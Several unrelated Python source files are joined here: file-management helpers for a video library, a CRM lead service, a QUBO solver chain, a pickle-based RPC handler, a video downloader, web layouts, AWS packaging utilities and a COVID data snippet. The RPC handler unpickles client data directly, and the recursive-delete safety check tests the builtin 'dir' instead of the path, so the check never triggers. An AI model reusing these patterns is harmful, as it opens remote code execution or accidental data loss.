Using recursion, delete all files and folders in the specified dir and
itself if the total dir size is less than max_size (default 50 KB).
Args:
path: (str, utf-8) path to be recursively deleted.
max_size: (int) optional max size in Bytes a folder can be to qualify for deletion. Default=50000.
"""
# Get count of files
files_count = len(cls.find_deep(path))
# First we ensure the dir is less than the max_size threshold, otherwise abort.
if _size_dir(path) < max_size or max_size == -1 or files_count == 0:
console.debug(f'Recursively deleting {path}')
# An emergency safety check in case there's an attempt to delete / (root!) or one of the source_paths.
if dir == '/' or dir in config.source_dirs:
raise OSError(f"Somehow you tried to delete '{path}' by calling delete.dir_recursive()... Don't do that!")
# Otherwise, only perform destructive actions if we're running in live mode.
elif config.test is False:
try:
shutil.rmtree(path)
# Catch resource busy error
except OSError as e:
if e.args[0] == 16:
console.error(f'Tried to remove "{path}" but file is in use')
elif config.test is False:
console().red().indent(
f"Will not delete {path} ({'not empty' if files_count > 0 else formatter.pretty_size(max_size)})"
)
@classmethod
def delete_unwanted_files(cls, path):
"""Delete all unwanted files in the specified dir.
Using recursion, delete all invalid (unwanted) files and folders in the specified dir,
keeping track of the number of files that were deleted.
This could be dangerous, be careful not to accidentally run it on something like... /
Args:
path: (str, utf-8) root path where contents will be deleted.
count: (int) optional current number of deleted files (in case this is called multiple times
Returns:
Number of files that were deleted successfully.
"""
deleted_files = 0
# Only perform destructive actions if in live mode.
if not config.test:
# Only delete unwanted files if enabled in config
if config.remove_unwanted_files:
# Search for invalid files, enumerate them, and delete them.
for f in [f for f in cls.get_invalid_files(path) if os.path.isfile(f)]:
# Increment deleted_files if deletion was successful.
# `fileops.delete` has test check built in, so
# no need to check here.
deleted_files += fileops.delete(f)
return deleted_files
class fileops:
"""File-related class method operations.
"""
@classmethod
def has_valid_ext(cls, path):
"""Check if file has a valid extension.
Check the specified file's extension against config.video_exts and config.extra_exts.
Args:
path: (str, utf-8) path of file to check.
Returns:
True if the file has a valid extension, else False.
"""
return any([path.endswith(ext) for ext in config.video_exts + config.extra_exts])
@classmethod
def is_acceptable_size(cls, file_path):
"""Determine if a file_path is an acceptable size.
Args:
file: (str, utf-8) path to file.
Returns:
True, if the file is an acceptable size, else False.
"""
s = size(file_path)
min = cls.min_filesize_for_resolution(file_path)
is_video = any([file_path.endswith(ext) for ext in config.video_exts])
is_extra = any([file_path.endswith(ext) for ext in config.extra_exts])
return ((s >= min * 1024 * 1024 and is_video)
or (s >= 0 and is_extra))
@classmethod
def min_filesize_for_resolution(cls, file_path):
"""Determine the minimum filesize for the resolution for file path.
Args:
file: (str, utf-8) path to file.
Returns:
int: The minimum file size, or default if resolution could not be determined
"""
min = config.min_filesize
if isinstance(min, int):
return min
# If the min filesize is not an int, we assume
# that it is an AttrMap of resolutions.
from fylmlib.parser import parser
res = parser.get_resolution(file_path)
if res is None:
return min.default
if res == '720p' or res == '1080p' or res == '2160p':
return min[res]
elif res.lower() == 'sd' or res.lower() == 'sdtv':
return min.SD
else:
return min.default
@classmethod
def safe_move(cls, src: str, dst: str, ok_to_upgrade = False):
"""Performs a 'safe' move operation.
Performs some additional checks before moving files. Optionally supports
config.safe_copy, which forcibly copies files from one folder to the next
instead of moving them, even if the files exist on the same partition.
Args:
src: (str, utf-8) path of file to move.
dst: (str, utf-8) destination for file to move to.
ok_to_upgrade: (Bool) True if this file is OK to replace an existing one
as determined by checking for identical duplicates
that meet upgrade criteria.
Returns:
True if the file move was successful, else False.
"""
# Abort if src does not exist in live mode. We can't raise this error in
# test mode, because the file would never have been renamed.
if not os.path.exists(src) and config.test is False:
raise OSError(f'Path does not exist: {src}')
# Silently abort if the src and dst are the same.
if src == dst:
console.debug('Source and destination are the same, nothing to move')
return False
# Try to create destination folders if they do not exist.
dirops.create_deep(os.path.dirname(dst))
console.debug(f"\n Moving: '{src}'")
console.debug(f" To: '{dst}'\n")
# Check if a file already exists with the same name as the one we're moving.
# By default, abort here (otherwise shutil.move would silently overwrite it)
# and print a warning to the console. If force_overwrite is enabled,
# proceed anyway, otherwise forcibly prevent accidentally overwriting files.
# If the function was called with a Should property, we can skip this if it's
# marked for upgrade.
if os.path.exists(dst) and not ok_to_upgrade:
# If force_overwrite is turned off, we can't overwrite this file.
# If interactive is on, the user has some more flexibility and can choose to
# overwrite, so we can skip this.
if config.duplicates.force_overwrite is False and config.interactive is False:
# If we're not overwriting, return false
console().red().indent(f"Unable to move; a file with the same name already exists in '{os.path.dirname(dst)}'").print()
return False
# File overwriting is enabled and not marked to upgrade, so warn but continue
console().yellow().indent(f"Replacing existing file in '{os.path.dirname(dst)}'").print()
# Handle macOS (darwin) converting / to : on the filesystem reads/writes.
# Credit: https://stackoverflow.com/a/34504896/1214800
if sys.platform == 'darwin':
dst = os.path.join(os.path.dirname(dst), os.path.basename(dst).replace(r'/', '-'))
# Only perform destructive changes if running in live mode, so we can short-circuit
# the rest by returning True here and presuming it was successful.
if config.test is True:
return True
try:
# If we're overwriting, first try and rename the existing (identical)
# duplicate so we don't lose it if the move fails
if os.path.exists(dst):
os.rename(dst, f'{dst}.dup')
# If safe_copy is enabled, or if partition is not the same, copy instead.
if config.safe_copy is True or not dirops.is_same_partition(src, dst):
# Store the size of the source file to verify the copy was successful.
expected_size = size(src)
# Generate a new filename using .partial~ to indicate the file
# has not be completely copied.
partial_dst = f'{dst}.partial~'
# Copy the file using progress bar
cls.copy_with_progress(src, partial_dst)
# Verify that the file is within one byte of the original.
dst_size = size(partial_dst)
if abs(dst_size - expected_size) <= 1:
os.rename(partial_dst, partial_dst.rsplit('.partial~', 1)[0])
os.remove(src)
# If not, then we print an error and return False.
else:
console().red().indent(f"Size mismatch; file is {dst_size:,} bytes, expected {expected_size:,} bytes")
return False
# Otherwise, move the file instead.
else:
shutil.move(src, dst)
# Clean up any backup duplicate that might have been created, if the move was successful
if os.path.exists(dst) and os.path.exists(f'{dst}.dup'):
os.remove(f'{dst}.dup')
return True
except (IOError, OSError) as e:
# Catch exception and soft warn in the console (don't raise Exception).
console().red().indent(f'Failed to move {src} to {dst}')
console.debug(e)
print(e)
# If we're overwriting and a duplicate was created, undo its renaming
if os.path.exists(f'{dst}.dup'):
os.rename(f'{dst}.dup', dst)
return False
@classmethod
def copy_with_progress(cls, src, dst, follow_symlinks=True):
"""Copy data from src to dst and print a progress bar.
If follow_symlinks is not set and src is a symbolic link, a new
symlink will be created instead of copying the file it points to.
Args:
src: (str, utf-8) path to source file.
dst: (str, utf-8) path to destionation.
follow_symlinks: (bool) follows symbolic links to files and re-creates them.
"""
# Hide the cursor
cursor.hide()
# If the destination is a folder, include the folder
# in the destination copy.
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
# If the source and destination are the same, abort.
if shutil._samefile(src, dst):
return
for fn in [src, dst]:
try:
st = os.stat(fn)
except OSError:
# File most likely does not exist.
pass
else:
if shutil.stat.S_ISFIFO(st.st_mode):
raise shutil.SpecialFileError(f"`{fn}` is a named pipe")
# Handle symlinks.
if not follow_symlinks and os.path.islink(src):
os.symlink(os.readlink(src), dst)
else:
size = os.stat(src).st_size
with open(src, 'rb') as fsrc:
with open(dst, 'wb') as fdst:
cls._copyfileobj(fsrc, fdst, callback=console().print_copy_progress_bar, total=size)
# Perform a low-level copy.
shutil.copymode(src, dst)
# Show the cursor.
cursor.show()
# Clear the progress bar from the console.
console.clearline()
@classmethod
def _copyfileobj(cls, fsrc, fdst, callback, total, length=16*1024):
"""Internal method for low-level copying.
Executes low-level file system copy and calls back progress
to progress bar function.
Args:
fsrc: (str, utf-8) path to source file.
fdst: (str, utf-8) path to destionation.
callback: (function) callback function to be called when progress is changed.
total: (int) total expected size of file in B.
length: (int) total length of buffer.
"""
copied = 0
while True:
buf = fsrc.read(length)
if not buf:
break
fdst.write(buf)
copied += len(buf)
callback(copied, total=total)
@classmethod
def rename(cls, src, new_filename_and_ext):
"""Renames a file using shutil.move.
Renames a file using shutil.move, which under the hood, intelligently determines
whether or not to use os.rename or shutil.copy. Normally this wouldn't matter, but
this allows the function to be flexible enough to support srt/dst being on
different partitions.
Args:
src: (str, utf-8) full path (including filename) of file to move.
new_filename_and_ext: (str, utf-8) new filename.ext (not including path).
"""
# Handle macOS (darwin) converting / to : on the filesystem reads/writes.
# If we don't do this, the filesystem will try and create a new folder instead
# of the correct filename.
# Credit: https://stackoverflow.com/a/34504896/1214800
new_filename_and_ext = new_filename_and_ext.replace(r'/', '-')
# Generate a destination string based on src's path and the new filename
dst = os.path.normpath(os.path.join(os.path.dirname(src), new_filename_and_ext))
# Silently abort if the src==dst (we don't need to waste cycles renaming files
# that are already correctly named). This also allows us to check for identically
# named files that may already exist, in order to not overwrite them.
if src == dst:
return
# Check if a file already exists (case sensitive) with the same name as the
# one we're renaming. If it does, abort (otherwise shutil.move would
# silently overwrite it) and print a warning to the console.
if os.path.exists(dst) and os.path.basename(src) == os.path.basename(dst):
console().red().indent(f'Unable to rename {dst} (identical file already exists)')
return
console.debug(f'Renaming: {src}')
console.debug(f' To: {dst}')
# Only perform destructive changes if we're in live mode.
if not config.test:
# Rename the file using shutil.move (instead of os.rename). (os.rename won't work if the
# src/dst are on different partitions, so we use shutil.move instead). There is also
# some funky (untested) Windows-related stuff that makes .move the obvious choice.
os.rename(src, dst)
@classmethod
def contains_ignored_strings(cls, path):
"""Determines of a file contains any of the ignored substrings (e.g. 'sample').
Checks a path string and determines if it contains any of the forbidden substrins.
A word of caution: if you add anything common to the config, you may prevent some
files from being moved.
Args:
path: (str, utf-8) full path (including filename) of file to check for ignored strings.
Returns:
True if any of the ignored strings are found in the file path, else False.
"""
return any(word.lower() in path.lower() for word in config.ignore_strings)
@classmethod
def delete(cls, file):
"""Deletes a file.
Attempts to delete the specified file, and returns a number that can be used to
increment a counter if the deletion was successful.
Args:
file: (str, utf-8) full path (including filename) of file to check for ignored strings.
"""
console.debug(f"Deleting file {file}")
# If we're running in test mode, return a mock success (we assume the deletion
# would have been successful had it actually run).
if config.test:
return 1
# Only perform destructive changes if running in live mode.
try:
# Try to remove the file
os.remove(file)
# If successful, return 1, for a successful op.
return 1
except Exception:
# Handle any exceptions gracefully and warn the console.
console().red().indent(f'Unable to remove {file}')
# Return 0 because we don't want a success counter to increment.
return 0
def largest_video(path):
"""Determine the largest video file in dir.
Args:
path: (str, utf-8) file or folder to determine size of video file.
Returns:
Path of largest video file, or None if path does not exist.
"""
# First check that the path actually exists before we try to determine its size.
if os.path.exists(path):
# If it's a directory, we need to find the largest video file, recursively.
if os.path.isdir(path):
try:
video_files = list(filter(lambda f: os.path.splitext(f)[1] in config.video_exts, dirops.get_valid_files(path)))
# Re-populate list with (filename, size) tuples
for i, file in enumerate(video_files):
video_files[i] = (file, os.path.getsize(file))
# Sort list by file size from largest to smallest and return the first file.
video_files.sort(key=lambda v: v[1], reverse=True)
# Return path (first value -- second value is size) of first file in sorted array.
return video_files[0][0]
# If an out of range error is encountered, something went wrong and the file
# probably doesn't exist.
except IndexError:
return None
# If it's a file, return the path.
else:
return path
# If the path doesn't exist, we return None
else:
return None
def size(path) -> int:
"""Determine the size of a file or dir.
Args:
path: (str, utf-8) file or folder to determine size.
Returns:
Size of file or folder, in bytes (B), or None if path does not exist.
"""
# First check that the path actually exists before we try to determine its size.
if path is not None:
if not os.path.exists(path):
raise Exception(f'Cannot calculate size for a path that does not exist ({path})')
# If it's a directory, we need to call the _size_dir func to recursively get
# the size of each file inside.
if os.path.isdir(path):
return _size_dir(path)
# If it's a file, we simply call getsize().
else:
return os.path.getsize(path)
# If the path doesn't exist, we return None
else:
return None
def _size_dir(path):
"""Determine the total size of a directory.
Determine the size of directory at the specified path by recursively calculating
the size of each file contained within.
Args:
path: (str, utf-8) folder to determine size.
Returns:
Combined size of folder, in bytes (B), or None if dir does not exist.
"""
if not os.path.exists(path):
return None
# Start with a dir size of 0 bytes
dir_size = 0
# Call os.walk() to get all files, recursively in the dir, then add up the file
# size for each file.
for root, dirs, files in os.walk(path):
for f in files:
fp = os.path.join(root, f)
dir_size += (os.path.getsize(fp) if os.path.isfile(fp) else 0)
# Return the total calculated size of the directory.
return dir_size
|
import datetime
from app.main import db
from app.main.model.lead import Lead
from app.main.model.status import Status
from app.main.service.business_rules import is_valid_status_change, need_new_customer, need_to_book_meeting
from app.main.service.customer_service import save_new_customer
from app.main.service.opportunity_service import save_new_opportunity, change_all_opportunities_description
def get_all_leads():
return Lead.query.all()
def get_lead_by_id(id):
lead = Lead.query.get(id)
return lead
def save_new_lead(data):
status = Status.query.get(1)
new_lead = Lead(data['customer_name'], data['customer_phone'], data['customer_email'], status)
status.leads.append(new_lead)
save_changes(status)
for oportunity in data['oportunities']:
save_new_opportunity(new_lead, oportunity)
response_object = {
'method': 'save_new_lead',
'status': 'success',
'message': 'Successfully registered.'
}
return response_object, 201
def delete_all_leads():
all = Lead.query.all()
for lead in all:
db.session.delete(lead)
db.session.commit()
def change_lead_status(data):
lead = get_lead_by_id(data['id'])
if lead is None:
response_object = {
'method': 'change_lead_status',
'status': 'fail',
'message': 'Lead not found.'
}
return response_object, 404
old_status = lead.status
new_status = Status.query.filter_by(id=data['status']).first()
if new_status is None:
response_object = {
'method': 'change_lead_status',
'status': 'fail',
'message': 'New status not found.'
}
return response_object, 404
if is_valid_status_change(old_status, new_status):
old_status.leads.remove(lead)
new_status.leads.append(lead)
if(need_new_customer(new_status)):
save_new_customer(lead)
if(need_to_book_meeting(new_status)):
date = data["date"].strftime("%m/%d/%Y %H:%M")
change_all_opportunities_description(" Agendado: "+ date)
save_changes(old_status)
save_changes(new_status)
response_object = {
'method': 'change_lead_status',
'status': 'success',
'message': 'Status successfully changed.'
}
return response_object, 201
else:
response_object = {
'method': 'change_lead_status',
'status': 'fail',
'message': 'Fail to change status.'
}
return response_object, 404
def save_changes(data):
db.session.add(data)
db.session.commit()
|
from utils.data import read_inventory_optimization_data
class Chain(list):
def __init__(self) -> None:
super().__init__()
def process_single_qubo(self, index, sampler, **kwargs):
qubo = self[index]
qubo.solve(sampler, **kwargs)
def process_best(self, samplers: list, sampler_params: list):
"""Processes the chain but only passes the best solutions forward
Args:
samplers - list of samplers to use, must be same length as self
sampler_params - list of paramaters to use for the samplers must be same length as self
"""
previous_qubo = None
for qubo, sampler, sampler_params in zip(self, samplers, sampler_params):
if previous_qubo is None:
# first qubo to process
qubo.solve(sampler, **sampler_params)
previous_qubo = qubo
continue
next_iteration_data = previous_qubo.post_process[0]
print('Starting next iteration with data', next_iteration_data)
qubo.build(**next_iteration_data)
qubo.solve(sampler, **sampler_params)
previous_qubo = qubo
if __name__ == "__main__":
from models.ProfitQubo import ProfitQubo
from models.SupplierQubo import SupplierQubo
from utils.data import read_profit_optimization_data
from config import standard_mock_data
from neal import SimulatedAnnealingSampler
from dwave.system import LeapHybridDQMSampler
import numpy as np
data_file = standard_mock_data['small']
inventory_requirement, supplier_inventory = read_inventory_optimization_data(data_file)
# def return_
qubo0 = SupplierQubo(inventory_requirement, supplier_inventory)
def get_post_process_inventory_function(data_file:str):
def post_process_inventory_qubo(solution, energy):
from utils.data import read_profit_optimization_data
hacky_suppliers = [f'supplier{i}' for i in np.where(solution)[0]] # looses the name, but its a hackathon.
profit, cost = read_profit_optimization_data(data_file, hacky_suppliers)
return dict(
profits=profit,
costs=cost
)
return post_process_inventory_qubo
qubo0.define_post_process_function(get_post_process_inventory_function(data_file))
sampler0 = SimulatedAnnealingSampler().sample
sampler0_params = dict()
qubo1 = ProfitQubo()
sampler1 = LeapHybridDQMSampler().sample_dqm
sampler1_params = dict()
chain = Chain()
chain.append(qubo0)
chain.append(qubo1)
samplers = [sampler0, sampler1]
sampler_params = [sampler0_params, sampler1_params]
chain.process_best(samplers, sampler_params)
|
'''
define the rpc processing logic
'''
import pickle
from .exception import FunctionNotExistError
class Service:
'''
parsing the client data and call the functions
'''
def __init__(self):
self._function_dict = {}
def register(self, function_name, function):
'''
register the function into function dict
'''
self._function_dict[function_name] = function
def call(self, function_name, *params):
'''
call the functions with giving params
'''
try:
if function_name not in self._function_dict:
return FunctionNotExistError("the function not in the service")
return self._function_dict[function_name](*params)
except Exception as e:
return e
def result_pack(self, data):
'''
packing the result and send back to the client
'''
if isinstance(data, Exception):
return pickle.dumps({"error": str(data)})
else:
return pickle.dumps({"result": data})
def run(self, unpacked_data):
'''
unpack the client data and call the functions
'''
packed_data = pickle.loads(unpacked_data)
function_name, params = packed_data["function_name"], packed_data["params"]
call_output = self.call(function_name, *params)
return self.result_pack(call_output)
|
#encoding:utf8
import urllib2
import urllib
import re
import sys
import os
import time
def Schedule(a,b,c):
per = 100.0 * a * b / c
if per > 100 : per = 100
sys.stdout.write(u"------进度:%.1f%%\r" % per)
sys.stdout.flush()
def createDir():
path = sys.path[0]
new_path = os.path.join(path,'flv')
if not os.path.isdir(new_path):
os.mkdir(new_path)
return new_path
def getList(id):
url = "http://www.yinyuetai.com/insite/get-video-info?flex=true&videoId=%d" % id
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
}
try:
req = urllib2.Request(url, None, headers)
res = urllib2.urlopen(req)
html = res.read()
reg = r"http://\w*?\.yinyuetai\.com/uploads/videos/common/.*?(?=&br)"
pattern=re.compile(reg)
findList = re.findall(pattern,html)
if len(findList) >= 3:
return findList[2]
else:
return findList[0]
except:
print u"读取视频列表失败!"
def download(id,name):
link = getList(id)
if link:
name = name + '.flv'
print u"下载:[%s]" % name
local = createDir()+'/'+name
try:
urllib.urlretrieve(link,local,Schedule)
print u"------下载完成:[%s]\n" % name
except:
print u"下载失败!\n"
#for url in urlList: #下载全部
#name = url.split('/')[-1].split('?')[0]
#name = getFlvName(id)+'-%d.flv' % i
#print u"下载:[%s]" % name
#local = createDir()+'/'+name
#urllib.urlretrieve(url,local,Schedule)
#i += 1
#print u" 下载完成:[%s]" % name
#print ''
else:
print u"没有发现视频!\n"
def getFlvName(id):
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
}
timeout = 5
url = 'http://v.yinyuetai.com/video/%d' % id
request = urllib2.Request(url, None, headers)
response = urllib2.urlopen(request, None, timeout)
responseHtml = response.read()
#print responseHtml
pattern=re.compile(r"<h3\sclass=\"fl\sf18\">(.+)<\/h3>")
findList = re.findall(pattern,responseHtml)
try:
return findList[0].decode('utf8')
except:
return False
def start():
while 1:
id = raw_input('ID:>')
try:
id = int(id)
break
except:
pass
name = getFlvName(id) #读取mv名字
if name == False: #读取失败则输入
print u'获取MV名字失败!输入MV名字'
name = raw_input(u'name:>')
name = name.decode('gbk')
#开始下载
print u"开始下载..."
download(id,name)
start()
if __name__ == '__main__':
start() |
from functools import cached_property
from onegov.core.elements import Confirm
from onegov.core.elements import Intercooler
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
from onegov.wtfs.security import AddModel
from onegov.wtfs.security import DeleteModel
from onegov.wtfs.security import EditModel
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from onegov.core.elements import Element
class MunicipalitiesLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return _("Municipalities")
@cached_property
def editbar_links(self) -> list['Element']:
result: list['Element'] = []
if self.request.has_permission(self.model, EditModel):
result.append(
Link(
text=_("Import data"),
url=self.request.link(self.model, 'import-data'),
attrs={'class': 'upload-icon'}
)
)
if self.request.has_permission(self.model, AddModel):
result.append(
Link(
text=_("Add"),
url=self.request.link(
self.model,
name='add'
),
attrs={'class': 'add-icon'}
)
)
return result
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(self.title, self.municipalities_url)
]
class ImportMunicipalityDataLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return _("Import data")
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Municipalities"), self.municipalities_url),
Link(self.title, '#')
]
@cached_property
def cancel_url(self) -> str:
return self.municipalities_url
@cached_property
def success_url(self) -> str:
return self.municipalities_url
class MunicipalityLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return self.model.name
@cached_property
def editbar_links(self) -> list['Element']:
result: list['Element'] = []
if self.request.has_permission(self.model, EditModel):
result.append(
Link(
text=_("Edit"),
url=self.request.link(self.model, 'edit'),
attrs={'class': 'edit-icon'}
)
)
result.append(
Link(
text=_("Delete pick-up dates"),
url=self.request.link(self.model, 'delete-dates'),
attrs={'class': 'delete-icon'}
)
)
if self.request.has_permission(self.model, DeleteModel):
result.append(
Link(
text=_("Delete"),
url=self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-icon'},
traits=(
Confirm(
_(
"Do you really want to delete this "
"municipality?"
),
_("This cannot be undone."),
_("Delete"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.municipalities_url
)
)
)
)
return result
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Municipalities"), self.municipalities_url),
Link(self.title, '#')
]
class AddMunicipalityLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return _("Add municipality")
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Municipalities"), self.municipalities_url),
Link(_("Add"), '#')
]
@cached_property
def cancel_url(self) -> str:
return self.municipalities_url
@cached_property
def success_url(self) -> str:
return self.municipalities_url
class EditMunicipalityLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return _("Edit municipality")
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Municipalities"), self.municipalities_url),
Link(self.model.name, self.request.link(self.model)),
Link(_("Edit"), '#')
]
@cached_property
def cancel_url(self) -> str:
return self.request.link(self.model)
@cached_property
def success_url(self) -> str:
return self.municipalities_url
class DeleteMunicipalityDatesLayout(DefaultLayout):
@cached_property
def title(self) -> str:
return _("Delete pick-up dates")
@cached_property
def breadcrumbs(self) -> list['Element']:
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Municipalities"), self.municipalities_url),
Link(self.model.name, self.request.link(self.model)),
Link(self.title, '#')
]
@cached_property
def cancel_url(self) -> str:
return self.request.link(self.model)
@cached_property
def success_url(self) -> str:
return self.request.link(self.model)
|
import boto3
import semver
from aws_conduit import conduit_factory as factory
from aws_conduit.conduit_portfolio import ConduitPortfolio
SESSION = boto3.session.Session()
IAM = boto3.client('iam')
STS = boto3.client('sts')
CONFIG_PREFIX = 'conduit.yaml'
RESOURCES_KEY = "__resources__"
BUCKET_KEY = "__bucket__"
PREFIX_KEY = "__prefix__"
RESOURCES_KEY_OTHER = "__|resources|__"
BUCKET_KEY_OTHER = "__|bucket|__"
PREFIX_KEY_OTHER = "__|prefix|__"
def get_region():
region = SESSION.region_name
return region
def get_account_id():
account_id = STS.get_caller_identity().get('Account')
return account_id
def get_alias():
"""
Get the users account alias.
Return:
alias: The first known account alias.
"""
aliases = IAM.list_account_aliases()
if aliases and aliases['AccountAliases']:
return aliases['AccountAliases'][0]
def get_portfolio(config, name=None, portfolio_id=None):
for portfolio in config['portfolios']:
if name is not None:
if portfolio.name == name:
return portfolio
if portfolio_id is not None:
if portfolio.portfolio_id == portfolio_id:
return portfolio
raise ValueError('Portfolio not found: {} {}'.format(portfolio_id, name))
def get_product(config, name=None, product_id=None):
for portfolio in config['portfolios']:
for product in portfolio.products:
if product_id is not None:
if product.product_id == product_id:
return product
if name is not None:
if product.name == name:
return product
raise ValueError('Product not found: {} {}'.format(product_id, name))
ACCOUNT_ID = get_account_id()
def inject_config(function):
start = factory.start()
bucket = start.create_s3()
configuration = bucket.get_config(CONFIG_PREFIX)
def wrapper(*args, **kwargs):
result = function(*args, **kwargs, config=configuration)
bucket.put_config(configuration, CONFIG_PREFIX)
return result
return wrapper
def find_build_product(spec, config):
portfolio = None
product = None
for port in config['portfolios']:
if isinstance(port, ConduitPortfolio):
if port.name == spec['portfolio']:
portfolio = port
for prod in portfolio.products:
if prod.name == spec['product']:
product = prod
break
else:
if port['name'] == spec['portfolio']:
portfolio = port
for prod in portfolio['products']:
if prod['name'] == spec['product']:
product = prod
break
return dict(
product=product,
portfolio=portfolio
)
def get_all_portfolio_artifacts(portfolio_name, config):
templates = []
for port in config['portfolios']:
if isinstance(port, ConduitPortfolio):
if port.name == portfolio_name:
for product in port.products:
templates.append(dict(
template=product.template,
product=product.name
))
else:
if port['name'] == portfolio_name:
for product in port['products']:
templates.append(product)
return templates
def find_s3_build_product(spec, config):
print(spec)
default_product = dict(
name=spec['product'],
currentVersion='0.0.0'
)
result = find_build_product(spec, config)
if result['portfolio'] is None:
result['portfolio'] = dict(
name=spec['portfolio'],
products=[default_product]
)
result['product'] = default_product
config['portfolios'].append(result['portfolio'])
elif result['product'] is None:
result['product'] = default_product
result['portfolio']['products'].append(default_product)
return result
def next_version(release_type, current_version):
product_version = current_version
if release_type == 'build':
product_version = semver.bump_build(current_version)
if release_type == 'major':
product_version = semver.bump_major(current_version)
if release_type == 'minor':
product_version = semver.bump_minor(current_version)
if release_type == 'patch':
product_version = semver.bump_patch(current_version)
return product_version
def put_resource(source_path, destination_path, bucket, portfolio, product, version, environment='core'):
if environment is not None:
if destination_path is not None:
key = "{}/{}/{}/{}/{}".format(portfolio, product, environment, version, destination_path)
prefix = "{}/{}/{}/{}".format(portfolio, product, environment, version)
directory = "{}/{}/{}/{}/{}".format(bucket.name, portfolio, product, environment, version)
else:
key = "{}/{}/{}/{}".format(portfolio, product, environment, version)
prefix = "{}/{}/{}/{}".format(portfolio, product, environment, version)
directory = "{}/{}/{}/{}/{}".format(bucket.name, portfolio, product, environment, version)
else:
if destination_path is not None:
key = "{}/{}/{}/{}".format(portfolio, product, version, destination_path)
prefix = "{}/{}/{}".format(portfolio, product, version)
directory = "{}/{}/{}/{}".format(bucket.name, portfolio, product, version)
else:
key = "{}/{}/{}".format(portfolio, product, version)
prefix = "{}/{}/{}".format(portfolio, product, version)
directory = "{}/{}/{}/{}".format(bucket.name, portfolio, product, version)
print("Adding resource to release: {}".format(source_path))
print("Key is: {}".format(key))
replace_resources(directory, bucket, prefix, path=source_path)
bucket.put_resource(source_path, key)
revert_resources(directory, bucket, prefix, path=source_path)
return "https://s3-{}.amazonaws.com/{}/{}".format(get_region(), directory, destination_path)
def read_write(function):
def wrapper(*args, **kwargs):
if 'path' in kwargs:
if isinstance(kwargs['path'], str):
path = kwargs['path']
else:
path = kwargs['path']['source']
if path.endswith('yaml') or path.endswith('yml') or path.endswith('json'):
f = open(path, 'r', encoding='utf-8')
filedata = f.read()
f.close()
newdata = function(*args, **kwargs, file_data=filedata)
if newdata is not None:
f = open(path, 'w', encoding='utf-8')
f.write(newdata)
f.close()
return wrapper
@read_write
def replace_resources(directory, bucket, prefix, path=None, file_data=None):
if file_data is not None:
print("Replacing in {}".format(path))
data = file_data.replace(RESOURCES_KEY, directory)
data = data.replace(BUCKET_KEY, bucket.name)
data = data.replace(PREFIX_KEY, prefix)
data = data.replace(RESOURCES_KEY_OTHER, RESOURCES_KEY)
data = data.replace(BUCKET_KEY_OTHER, BUCKET_KEY)
data = data.replace(PREFIX_KEY_OTHER, PREFIX_KEY)
return data
@read_write
def revert_resources(directory, bucket, prefix, path=None, file_data=None):
if file_data is not None:
print("Replacing in {}".format(path))
data = file_data.replace(BUCKET_KEY, BUCKET_KEY_OTHER)
data = data.replace(PREFIX_KEY, PREFIX_KEY_OTHER)
data = data.replace(RESOURCES_KEY, RESOURCES_KEY_OTHER)
data = data.replace(directory, RESOURCES_KEY)
data = data.replace(bucket.name,BUCKET_KEY)
data = data.replace(prefix, PREFIX_KEY)
return data
def put_sls_resource(path, bucket, portfolio, product, version, sls_package, environment='core'):
new_path = path
if '.serverless' in new_path:
new_path = new_path.replace('.serverless/', '')
directory = "{}/{}/{}/{}".format(portfolio, product, environment, version)
key = "{}/{}/{}/{}/{}".format(portfolio, product, environment, version, new_path)
replace_resources(directory, bucket, directory, path=path)
replace_sls_resources(directory, bucket.name, sls_package, environment, path=path)
print("Adding sls resource to release: {}".format(path))
bucket.put_resource(path, key)
revert_sls_resources(directory, bucket.name, sls_package, environment, path=path)
return "https://s3-{}.amazonaws.com/{}/{}/{}".format(get_region(), bucket.name, directory, new_path)
@read_write
def replace_sls_resources(key, bucket, sls_package, environment, path=None, file_data=None):
if file_data is not None:
print("333 444 Replacing in {}".format(path))
print("The key is: {}".format(key))
return file_data.replace(sls_package['artifactDirectoryName'], key).replace(sls_package['bucket'], bucket).replace('${STAGE}', environment).replace('.serverless', key)
@read_write
def revert_sls_resources(key, bucket, sls_package, environment, path=None, file_data=None):
if file_data is not None:
print("Reverting in {}".format(path))
print("The key is: {}".format(key))
return file_data.replace(key, sls_package['artifactDirectoryName']).replace(bucket, sls_package['bucket']).replace(environment, '${STAGE}')
|
import pandas as pd
import json
import sys
from casos import casos_positivos, casos_fallecidos
poblacion_cusco = 1360013
positivos_cusco = list(casos_positivos[casos_positivos['DEPARTAMENTO'] == "CUSCO"].shape)[0]
positivos_hombres_cusco = list(casos_positivos[(casos_positivos['DEPARTAMENTO'] == "CUSCO") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco = list(casos_positivos[(casos_positivos['DEPARTAMENTO'] == "CUSCO") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
